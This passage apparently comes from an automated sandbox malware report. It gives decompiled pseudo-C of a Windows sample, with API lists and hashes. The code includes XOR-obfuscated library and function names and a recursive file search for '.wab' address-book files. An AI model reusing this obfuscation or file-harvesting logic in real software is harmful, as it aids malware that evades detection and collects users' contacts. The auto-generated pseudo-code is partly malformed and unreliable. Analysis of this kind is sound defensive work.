                                                                    • Opcode Fuzzy Hash: 54a1af11615edc5cb99fd5eabcd91fc2120b0ec5e023a510fb0467e6766a05b0
                                                                    • Instruction Fuzzy Hash: 6F31EF72B002246BDB11AB61BD42EDE36B89F08318F51055FB004A6286DF7CDE418B9D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E00423D97() {
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t7;
                                                                    				char _t9;
                                                                    				char _t10;
                                                                    				long _t11;
                                                                    				_Unknown_base(*)()* _t15;
                                                                    				void* _t21;
                                                                    				struct HINSTANCE__* _t25;
                                                                    				intOrPtr _t29;
                                                                    				char _t31;
                                                                    
                                                                    				if(E004240A8() != 0) {
                                                                    					_push(_t29);
                                                                    					_t25 = GetModuleHandleA("kernel32.dll");
                                                                    					__eflags = _t25;
                                                                    					if(_t25 != 0) {
                                                                    						_t29 =  *0x430044;
                                                                    						 *0x4480f0 = GetProcAddress(_t25, "FlsAlloc");
                                                                    						"PHqtpHqt0Hqt" = GetProcAddress(_t25, "FlsGetValue");
                                                                    						"pHqt0Hqt" = GetProcAddress(_t25, "FlsSetValue");
                                                                    						_t15 = GetProcAddress(_t25, "FlsFree");
                                                                    						__eflags = "PHqtpHqt0Hqt";
                                                                    						 *0x4480fc = _t15;
                                                                    						if("PHqtpHqt0Hqt" == 0) {
                                                                    							"PHqtpHqt0Hqt" =  *0x43007c;
                                                                    							"pHqt0Hqt" =  *0x430078;
                                                                    							 *0x4480f0 = E00423BB9;
                                                                    							 *0x4480fc =  *0x430074;
                                                                    						}
                                                                    					}
                                                                    					_t7 =  *0x4480f0(E00423C50);
                                                                    					__eflags = _t7 - 0xffffffff;
                                                                    					 *0x446f28 = _t7;
                                                                    					if(__eflags == 0) {
                                                                    						L9:
                                                                    						E00423BC2();
                                                                    						_t9 = 0;
                                                                    						__eflags = 0;
                                                                    					} else {
                                                                    						_push(0x8c);
                                                                    						_push(1);
                                                                    						_t10 = E00427472(_t21, 1, _t29, __eflags);
                                                                    						_t31 = _t10;
                                                                    						__eflags = _t31;
                                                                    						if(_t31 == 0) {
                                                                    							goto L9;
                                                                    						} else {
                                                                    							_push(_t31);
                                                                    							_push( *0x446f28);
                                                                    							"pHqt0Hqt"();
                                                                    							__eflags = _t10;
                                                                    							if(_t10 == 0) {
                                                                    								goto L9;
                                                                    							} else {
                                                                    								 *((intOrPtr*)(_t31 + 0x54)) = 0x447678;
                                                                    								 *((intOrPtr*)(_t31 + 0x14)) = 1;
                                                                    								_t11 = GetCurrentThreadId();
                                                                    								 *(_t31 + 4) =  *(_t31 + 4) | 0xffffffff;
                                                                    								 *_t31 = _t11;
                                                                    								_t9 = 1;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					return _t9;
                                                                    				} else {
                                                                    					E00423BC2();
                                                                    					return 0;
                                                                    				}
                                                                    			}














                                                                    0x00423d9e
                                                                    0x00423da8
                                                                    0x00423db5
                                                                    0x00423db7
                                                                    0x00423db9
                                                                    0x00423dbb
                                                                    0x00423dcf
                                                                    0x00423ddc
                                                                    0x00423de9
                                                                    0x00423dee
                                                                    0x00423df0
                                                                    0x00423df7
                                                                    0x00423dfc
                                                                    0x00423e03
                                                                    0x00423e0d
                                                                    0x00423e17
                                                                    0x00423e21
                                                                    0x00423e21
                                                                    0x00423dfc
                                                                    0x00423e2b
                                                                    0x00423e31
                                                                    0x00423e34
                                                                    0x00423e39
                                                                    0x00423e7c
                                                                    0x00423e7c
                                                                    0x00423e81
                                                                    0x00423e81
                                                                    0x00423e3b
                                                                    0x00423e3d
                                                                    0x00423e43
                                                                    0x00423e44
                                                                    0x00423e49
                                                                    0x00423e4b
                                                                    0x00423e4f
                                                                    0x00000000
                                                                    0x00423e51
                                                                    0x00423e51
                                                                    0x00423e52
                                                                    0x00423e58
                                                                    0x00423e5e
                                                                    0x00423e60
                                                                    0x00000000
                                                                    0x00423e62
                                                                    0x00423e62
                                                                    0x00423e69
                                                                    0x00423e6c
                                                                    0x00423e72
                                                                    0x00423e76
                                                                    0x00423e78
                                                                    0x00423e78
                                                                    0x00423e60
                                                                    0x00423e4f
                                                                    0x00423e85
                                                                    0x00423da0
                                                                    0x00423da0
                                                                    0x00423da7
                                                                    0x00423da7

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,74714DE0,00000000,00422D4F,?,004303A8,00000060), ref: 00423DAF
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00423DC7
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00423DD4
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00423DE1
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00423DEE
                                                                    • FlsAlloc.KERNEL32(00423C50,?,004303A8,00000060), ref: 00423E2B
                                                                    • FlsSetValue.KERNEL32(00000000,?,004303A8,00000060), ref: 00423E58
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00423E6C
                                                                      • Part of subcall function 00423BC2: FlsFree.KERNEL32(00000002,00423E81,?,004303A8,00000060), ref: 00423BCD
                                                                      • Part of subcall function 00423BC2: RtlDeleteCriticalSection.NTDLL(00000000), ref: 0042410C
                                                                      • Part of subcall function 00423BC2: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00424136
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll$Mqt`7utIqt
                                                                    • API String ID: 2635119114-1287002404
                                                                    • Opcode ID: b0cfdf15e8502374e3aa62110b111cb4db541f1c987ff244a1c3e506358f05ea
                                                                    • Instruction ID: 8b3271458602b4f27c13399e64746306443c1ffdb750162da11a79dbd1cf2b8b
                                                                    • Opcode Fuzzy Hash: b0cfdf15e8502374e3aa62110b111cb4db541f1c987ff244a1c3e506358f05ea
                                                                    • Instruction Fuzzy Hash: 082183747103219BD7209F35BC05A1A7EF4EB56B51752923FE664C22A1EBBC89088B5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 36%
                                                                    			E00406820(intOrPtr _a4, intOrPtr _a8) {
                                                                    				void _v524;
                                                                    				char _v532;
                                                                    				void _v540;
                                                                    				char _v548;
                                                                    				void _v556;
                                                                    				char _v564;
                                                                    				char _v572;
                                                                    				char _v580;
                                                                    				void* _v588;
                                                                    				char _v824;
                                                                    				void* _v832;
                                                                    				signed int _v848;
                                                                    				char _v857;
                                                                    				char _v858;
                                                                    				char _v859;
                                                                    				signed char _v860;
                                                                    				signed char _v868;
                                                                    				intOrPtr _v872;
                                                                    				void* _v876;
                                                                    				void* _v892;
                                                                    				void* _v893;
                                                                    				void* _v894;
                                                                    				void* _v895;
                                                                    				void* _v896;
                                                                    				long _t71;
                                                                    				void* _t72;
                                                                    				signed int _t108;
                                                                    				signed int _t109;
                                                                    				signed int _t110;
                                                                    				signed int _t111;
                                                                    				signed int _t112;
                                                                    				signed int _t113;
                                                                    				void* _t115;
                                                                    				signed int _t116;
                                                                    				signed int _t125;
                                                                    				signed int _t148;
                                                                    				void* _t160;
                                                                    				intOrPtr _t170;
                                                                    				intOrPtr* _t177;
                                                                    				intOrPtr* _t180;
                                                                    				signed short _t182;
                                                                    				signed int _t186;
                                                                    				void* _t188;
                                                                    				void* _t189;
                                                                    				void* _t190;
                                                                    				void* _t191;
                                                                    
                                                                    				_t188 = (_t186 & 0xfffffff8) - 0x35c;
                                                                    				if(_v848 *  *0x447af4 * 0x62 - 0x4b + (_v848 *  *0x447af4 * 0x62 - 0x4b << 4) + _v848 >= 0x62) {
                                                                    				}
                                                                    				_v860 = 0x2a;
                                                                    				_v858 = 0x2a;
                                                                    				memset( &_v524, 0, 0x82 << 2);
                                                                    				_t189 = _t188 + 0xc;
                                                                    				_v859 = 0x2e;
                                                                    				_v857 = 0;
                                                                    				 *0x430018( &_v524, _a4);
                                                                    				 *0x430014( &_v532,  &_v868);
                                                                    				_t170 = E0041BF10( &_v540,  &_v860);
                                                                    				_v872 = _t170;
                                                                    				_t71 = GetLastError();
                                                                    				_t182 = 0;
                                                                    				if(_t170 == 0xffffffff) {
                                                                    					L36:
                                                                    					return _t71;
                                                                    				} else {
                                                                    					_t125 =  *(_t189 + 0x1c);
                                                                    					do {
                                                                    						if((_v860 & 0x00000010) == 0) {
                                                                    							L10:
                                                                    							_push(_t189 + 0x4c);
                                                                    							_t72 = E004055C0();
                                                                    							_t189 = _t189 + 4;
                                                                    							if(_t72 == 0) {
                                                                    								goto L34;
                                                                    							}
                                                                    							memset( &_v540, 0, 0x82 << 2);
                                                                    							_t191 = _t189 + 0xc;
                                                                    							 *0x430018( &_v540, _a4);
                                                                    							_t182 = _t182 + ((_t182 & 0x0000ffff) + 0x0000005c ^ 0x00000095) * 0x4f;
                                                                    							 *0x430014( &_v548,  &_v824);
                                                                    							_t108 = _t125 *  *0x447af4 * 0x62 - 0x4b + (_t125 *  *0x447af4 * 0x62 - 0x4b << 4) + _t125;
                                                                    							if(_t108 >= 0x62) {
                                                                    								_t109 = _t108 & 0x00000073;
                                                                    							} else {
                                                                    								_t109 = _t108 - 0x59;
                                                                    							}
                                                                    							 *((char*)(_t191 + 0x14)) = 0x2e;
                                                                    							if(_t109 >= 0x62) {
                                                                    								_t110 = _t109 & 0x00000073;
                                                                    							} else {
                                                                    								_t110 = _t109 - 0x59;
                                                                    							}
                                                                    							 *((char*)(_t191 + 0x15)) = 0x77;
                                                                    							if(_t110 >= 0x62) {
                                                                    								_t111 = _t110 & 0x00000073;
                                                                    							} else {
                                                                    								_t111 = _t110 - 0x59;
                                                                    							}
                                                                    							 *((char*)(_t191 + 0x16)) = 0x61;
                                                                    							if(_t111 >= 0x62) {
                                                                    								_t112 = _t111 & 0x00000073;
                                                                    							} else {
                                                                    								_t112 = _t111 - 0x59;
                                                                    							}
                                                                    							 *((char*)(_t191 + 0x17)) = 0x62;
                                                                    							if(_t112 >= 0x62) {
                                                                    								_t113 = _t112 & 0x00000073;
                                                                    							} else {
                                                                    								_t113 = _t112 - 0x59;
                                                                    							}
                                                                    							_t125 = (_t113 * 0x16f8 - 0x4b << 4) + _t113 + _t113 * 0x16f8 - 0x4b;
                                                                    							 *((char*)(_t191 + 0x20)) = 0;
                                                                    							_t115 = E0041A010( &_v556, _t191 + 0x14);
                                                                    							_t190 = _t191 + 8;
                                                                    							if(_t115 == 0) {
                                                                    								_t116 =  *0x447af4; // 0x0
                                                                    								_t148 = _t116 & 0x00000041;
                                                                    								_t160 = 0x6d;
                                                                    								do {
                                                                    									_t52 = _t116 - 0x1a9; // -425
                                                                    									_t116 = _t116 + (_t52 | _t148);
                                                                    									_t160 = _t160 - 1;
                                                                    								} while (_t160 != 0);
                                                                    								_push(_a8);
                                                                    								 *0x447af4 = _t116;
                                                                    								E00406680( &_v556);
                                                                    								goto L33;
                                                                    							} else {
                                                                    								if(_t182 >= 0x1c) {
                                                                    									_push(_a8);
                                                                    									_push( &_v556);
                                                                    									_t182 = _t182 | 0x00000008;
                                                                    									E00413FE0();
                                                                    								} else {
                                                                    									_push(_a8);
                                                                    									_push( &_v556);
                                                                    									_t182 = _t182 & 0x00000063;
                                                                    									E00413FE0();
                                                                    								}
                                                                    								L33:
                                                                    								_t189 = _t190 + 8;
                                                                    								goto L34;
                                                                    							}
                                                                    						}
                                                                    						_t177 =  *0x43000c;
                                                                    						_push(0x4301e0);
                                                                    						_push(_t189 + 0x50);
                                                                    						if( *_t177() == 0) {
                                                                    							L9:
                                                                    							if((_v868 & 0x00000010) != 0) {
                                                                    								goto L34;
                                                                    							}
                                                                    							goto L10;
                                                                    						}
                                                                    						_push(0x4301dc);
                                                                    						_push( &_v824);
                                                                    						if( *_t177() == 0) {
                                                                    							goto L9;
                                                                    						}
                                                                    						memset( &_v556, 0, 0x82 << 2);
                                                                    						_t190 = _t189 + 0xc;
                                                                    						 *0x430018( &_v556, _a4);
                                                                    						_t180 =  *0x430014;
                                                                    						 *_t180( &_v564, _t190 + 0x4c);
                                                                    						 *_t180( &_v572, 0x4301d8);
                                                                    						_t182 = (_t182 + ((_t182 & 0x0000ffff) + 0x0000005c ^ 0x00000083) * 0x4f) * (_t182 + ((_t182 & 0x0000ffff) + 0x0000005c ^ 0x00000083) * 0x4f) + (((_t182 + ((_t182 & 0x0000ffff) + 0x0000005c ^ 0x00000083) * 0x0000004f) * (_t182 + ((_t182 & 0x0000ffff) + 0x0000005c ^ 0x00000083) * 0x0000004f) & 0x0000ffff) + 0x0000005c ^ 0x000000a4) * 0x4f;
                                                                    						E00406820( &_v580, _a8);
                                                                    						goto L33;
                                                                    						L34:
                                                                    						_t172 =  *(_t189 + 0x1c);
                                                                    					} while (E0041BFA0( *(_t189 + 0x1c),  &_v860) != 0);
                                                                    					_t71 = E0041C020(_t172);
                                                                    					goto L36;
                                                                    				}
                                                                    			}

















































                                                                    0x00406826
                                                                    0x0040684e
                                                                    0x0040684e
                                                                    0x0040685a
                                                                    0x0040685e
                                                                    0x00406870
                                                                    0x00406870
                                                                    0x0040687e
                                                                    0x00406883
                                                                    0x00406888
                                                                    0x0040689b
                                                                    0x004068b3
                                                                    0x004068b5
                                                                    0x004068b9
                                                                    0x004068bf
                                                                    0x004068c4
                                                                    0x00406b13
                                                                    0x00406b19
                                                                    0x004068ca
                                                                    0x004068ca
                                                                    0x004068d0
                                                                    0x004068d5
                                                                    0x00406995
                                                                    0x00406999
                                                                    0x0040699a
                                                                    0x0040699f
                                                                    0x004069a4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004069bb
                                                                    0x004069bb
                                                                    0x004069c6
                                                                    0x004069e7
                                                                    0x004069e9
                                                                    0x00406a05
                                                                    0x00406a0a
                                                                    0x00406a11
                                                                    0x00406a0c
                                                                    0x00406a0c
                                                                    0x00406a0c
                                                                    0x00406a17
                                                                    0x00406a1c
                                                                    0x00406a23
                                                                    0x00406a1e
                                                                    0x00406a1e
                                                                    0x00406a1e
                                                                    0x00406a29
                                                                    0x00406a2e
                                                                    0x00406a35
                                                                    0x00406a30
                                                                    0x00406a30
                                                                    0x00406a30
                                                                    0x00406a3b
                                                                    0x00406a40
                                                                    0x00406a47
                                                                    0x00406a42
                                                                    0x00406a42
                                                                    0x00406a42
                                                                    0x00406a4d
                                                                    0x00406a52
                                                                    0x00406a59
                                                                    0x00406a54
                                                                    0x00406a54
                                                                    0x00406a54
                                                                    0x00406a72
                                                                    0x00406a7e
                                                                    0x00406a83
                                                                    0x00406a88
                                                                    0x00406a8d
                                                                    0x00406ac1
                                                                    0x00406ac8
                                                                    0x00406acb
                                                                    0x00406ad0
                                                                    0x00406ad0
                                                                    0x00406ad8
                                                                    0x00406ada
                                                                    0x00406ada
                                                                    0x00406ae0
                                                                    0x00406ae9
                                                                    0x00406aee
                                                                    0x00000000
                                                                    0x00406a8f
                                                                    0x00406a93
                                                                    0x00406aae
                                                                    0x00406ab6
                                                                    0x00406ab7
                                                                    0x00406aba
                                                                    0x00406a95
                                                                    0x00406a98
                                                                    0x00406aa0
                                                                    0x00406aa1
                                                                    0x00406aa4
                                                                    0x00406aa4
                                                                    0x00406af3
                                                                    0x00406af3
                                                                    0x00000000
                                                                    0x00406af3
                                                                    0x00406a8d
                                                                    0x004068db
                                                                    0x004068e1
                                                                    0x004068ea
                                                                    0x004068ef
                                                                    0x0040698a
                                                                    0x0040698f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040698f
                                                                    0x004068f5
                                                                    0x004068fe
                                                                    0x00406903
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040692a
                                                                    0x0040692a
                                                                    0x00406935
                                                                    0x0040693b
                                                                    0x00406953
                                                                    0x00406962
                                                                    0x00406975
                                                                    0x00406980
                                                                    0x00000000
                                                                    0x00406af6
                                                                    0x00406af6
                                                                    0x00406b05
                                                                    0x00406b0e
                                                                    0x00000000
                                                                    0x00406b0e

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$lstrcpy$lstrcmp$ErrorLast
                                                                    • String ID: .$.$a$b$w
                                                                    • API String ID: 1160506917-761354289
                                                                    • Opcode ID: cd9ca7fd5fb3b75defbf1686f7d1045c82f0f2779813ad00b65b4892f0036316
                                                                    • Instruction ID: 944f864f1580aec1f3d1b119698111f02ebf212727e9978900b8b7c0cb0cb5c3
                                                                    • Opcode Fuzzy Hash: cd9ca7fd5fb3b75defbf1686f7d1045c82f0f2779813ad00b65b4892f0036316
                                                                    • Instruction Fuzzy Hash: 118168732043458BC724DB64CD50B9B77E8BBD5304F058A3FE496E7180E678D6098BAB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 29%
                                                                    			E00429202(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
                                                                    				char _v8;
                                                                    				signed char _v12;
                                                                    				char _v20;
                                                                    				intOrPtr* _t13;
                                                                    				intOrPtr* _t14;
                                                                    				intOrPtr* _t17;
                                                                    				void* _t19;
                                                                    				_Unknown_base(*)()* _t23;
                                                                    				_Unknown_base(*)()* _t26;
                                                                    				void* _t28;
                                                                    				struct HINSTANCE__* _t31;
                                                                    				void* _t33;
                                                                    
                                                                    				_t28 = 0;
                                                                    				_t33 =  *0x4484a0 - _t28; // 0x0
                                                                    				if(_t33 != 0) {
                                                                    					L6:
                                                                    					_t13 =  *0x4484ac; // 0x0
                                                                    					if(_t13 == 0) {
                                                                    						L14:
                                                                    						_t14 =  *0x4484a4; // 0x0
                                                                    						if(_t14 != 0) {
                                                                    							_t28 =  *_t14();
                                                                    							if(_t28 != 0) {
                                                                    								_t17 =  *0x4484a8; // 0x0
                                                                    								if(_t17 != 0) {
                                                                    									_t28 =  *_t17(_t28);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						L18:
                                                                    						return  *0x4484a0(_t28, _a4, _a8, _a12);
                                                                    					}
                                                                    					_t19 =  *_t13();
                                                                    					if(_t19 == 0) {
                                                                    						L10:
                                                                    						if( *0x448274 < 4) {
                                                                    							_a14 = _a14 | 0x00000004;
                                                                    						} else {
                                                                    							_a14 = _a14 | 0x00000020;
                                                                    						}
                                                                    						goto L18;
                                                                    					}
                                                                    					_push( &_v8);
                                                                    					_push(0xc);
                                                                    					_push( &_v20);
                                                                    					_push(1);
                                                                    					_push(_t19);
                                                                    					if( *0x4484b0() == 0 || (_v12 & 0x00000001) == 0) {
                                                                    						goto L10;
                                                                    					} else {
                                                                    						goto L14;
                                                                    					}
                                                                    				}
                                                                    				_t31 = LoadLibraryA("user32.dll");
                                                                    				if(_t31 == 0) {
                                                                    					L12:
                                                                    					return 0;
                                                                    				}
                                                                    				_t23 = GetProcAddress(_t31, "MessageBoxA");
                                                                    				 *0x4484a0 = _t23;
                                                                    				if(_t23 == 0) {
                                                                    					goto L12;
                                                                    				} else {
                                                                    					 *0x4484a4 = GetProcAddress(_t31, "GetActiveWindow");
                                                                    					 *0x4484a8 = GetProcAddress(_t31, "GetLastActivePopup");
                                                                    					if( *0x448268 == 2) {
                                                                    						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
                                                                    						 *0x4484b0 = _t26;
                                                                    						if(_t26 != 0) {
                                                                    							 *0x4484ac = GetProcAddress(_t31, "GetProcessWindowStation");
                                                                    						}
                                                                    					}
                                                                    					goto L6;
                                                                    				}
                                                                    			}















                                                                    0x00429209
                                                                    0x0042920b
                                                                    0x00429213
                                                                    0x00429282
                                                                    0x00429282
                                                                    0x00429289
                                                                    0x004292c7
                                                                    0x004292c7
                                                                    0x004292ce
                                                                    0x004292d2
                                                                    0x004292d6
                                                                    0x004292d8
                                                                    0x004292df
                                                                    0x004292e4
                                                                    0x004292e4
                                                                    0x004292df
                                                                    0x004292d6
                                                                    0x004292e6
                                                                    0x00000000
                                                                    0x004292f0
                                                                    0x0042928b
                                                                    0x0042928f
                                                                    0x004292ae
                                                                    0x004292b5
                                                                    0x004292c1
                                                                    0x004292b7
                                                                    0x004292b7
                                                                    0x004292b7
                                                                    0x00000000
                                                                    0x004292b5
                                                                    0x00429294
                                                                    0x00429295
                                                                    0x0042929a
                                                                    0x0042929b
                                                                    0x0042929d
                                                                    0x004292a6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004292a6
                                                                    0x00429220
                                                                    0x00429224
                                                                    0x004292bd
                                                                    0x00000000
                                                                    0x004292bd
                                                                    0x00429236
                                                                    0x0042923a
                                                                    0x0042923f
                                                                    0x00000000
                                                                    0x00429241
                                                                    0x0042924f
                                                                    0x0042925d
                                                                    0x00429262
                                                                    0x0042926a
                                                                    0x0042926e
                                                                    0x00429273
                                                                    0x0042927d
                                                                    0x0042927d
                                                                    0x00429273
                                                                    0x00000000
                                                                    0x00429262

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(user32.dll,00430B00,?,?), ref: 0042921A
                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00429236
                                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00429247
                                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00429254
                                                                    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0042926A
                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042927B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                    • API String ID: 2238633743-1612076079
                                                                    • Opcode ID: ef1b00b40ee4f8fce257c0a2842e4dcc60fc60ea9a057ff8d7535375d965edc5
                                                                    • Instruction ID: 446edb52bc3954b56b2ce01bcc63d0f2e67b9e6c886cd8b1c26a0e117dc1792e
                                                                    • Opcode Fuzzy Hash: ef1b00b40ee4f8fce257c0a2842e4dcc60fc60ea9a057ff8d7535375d965edc5
                                                                    • Instruction Fuzzy Hash: 59218E35704227FADB119FB5AC84B6F3BA8AB46754F4404BEE501D6191EB78DC00DA3D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041E5F0() {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				struct HINSTANCE__* _t24;
                                                                    				void* _t28;
                                                                    				CHAR* _t30;
                                                                    
                                                                    				_t24 =  *0x447d80; // 0x0
                                                                    				if(_t24 == 0) {
                                                                    					 *_t30 = 0x52;
                                                                    					_v11 = 0x54;
                                                                    					_v10 = 0x42;
                                                                    					_v9 = 0x55;
                                                                    					_v8 = 0x14;
                                                                    					_v7 = 0x15;
                                                                    					_v6 = 9;
                                                                    					_v5 = 0x43;
                                                                    					_v4 = 0x4b;
                                                                    					_v3 = 0x4b;
                                                                    					_v2 = 0x27;
                                                                    					do {
                                                                    						_t30[_t24] = _t30[_t24] ^ 0x00000027;
                                                                    						_t24 =  &(_t24->i);
                                                                    					} while (_t24 < 0xb);
                                                                    					_t24 = LoadLibraryA(_t30);
                                                                    					 *0x447d80 = _t24;
                                                                    				}
                                                                    				if( *0x44aec8 == 0) {
                                                                    					 *_t30 = 0x4f;
                                                                    					_v11 = 0x4b;
                                                                    					_v10 = 0x48;
                                                                    					_v9 = 0x4a;
                                                                    					_v8 = 0x51;
                                                                    					_v7 = 0x56;
                                                                    					_v6 = 0x4c;
                                                                    					_v5 = 0x5e;
                                                                    					_v4 = 0x79;
                                                                    					_v3 = 0x38;
                                                                    					_t28 = 0;
                                                                    					do {
                                                                    						_t30[_t28] = _t30[_t28] ^ 0x00000038;
                                                                    						_t28 = _t28 + 1;
                                                                    					} while (_t28 < 0xa);
                                                                    					_t24 = GetProcAddress(_t24, _t30);
                                                                    					 *0x44aec8 = _t24;
                                                                    					if(_t24 == 0) {
                                                                    						_t24 =  *0x447d7c; // 0x1
                                                                    						if(_t24 != 0) {
                                                                    							return E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t24;
                                                                    			}
















                                                                    0x0041e5f0
                                                                    0x0041e5fa
                                                                    0x0041e5fc
                                                                    0x0041e600
                                                                    0x0041e605
                                                                    0x0041e60a
                                                                    0x0041e60f
                                                                    0x0041e614
                                                                    0x0041e619
                                                                    0x0041e61e
                                                                    0x0041e623
                                                                    0x0041e628
                                                                    0x0041e62d
                                                                    0x0041e632
                                                                    0x0041e632
                                                                    0x0041e636
                                                                    0x0041e637
                                                                    0x0041e640
                                                                    0x0041e646
                                                                    0x0041e646
                                                                    0x0041e653
                                                                    0x0041e655
                                                                    0x0041e659
                                                                    0x0041e65e
                                                                    0x0041e663
                                                                    0x0041e668
                                                                    0x0041e66d
                                                                    0x0041e672
                                                                    0x0041e677
                                                                    0x0041e67c
                                                                    0x0041e681
                                                                    0x0041e686
                                                                    0x0041e688
                                                                    0x0041e688
                                                                    0x0041e68c
                                                                    0x0041e68d
                                                                    0x0041e697
                                                                    0x0041e69f
                                                                    0x0041e6a4
                                                                    0x0041e6a6
                                                                    0x0041e6ad
                                                                    0x00000000
                                                                    0x0041e6b1
                                                                    0x0041e6ad
                                                                    0x0041e6a4
                                                                    0x0041e6b9

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000001), ref: 0041E640
                                                                    • GetProcAddress.KERNEL32(00000000,00000001), ref: 0041E697
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
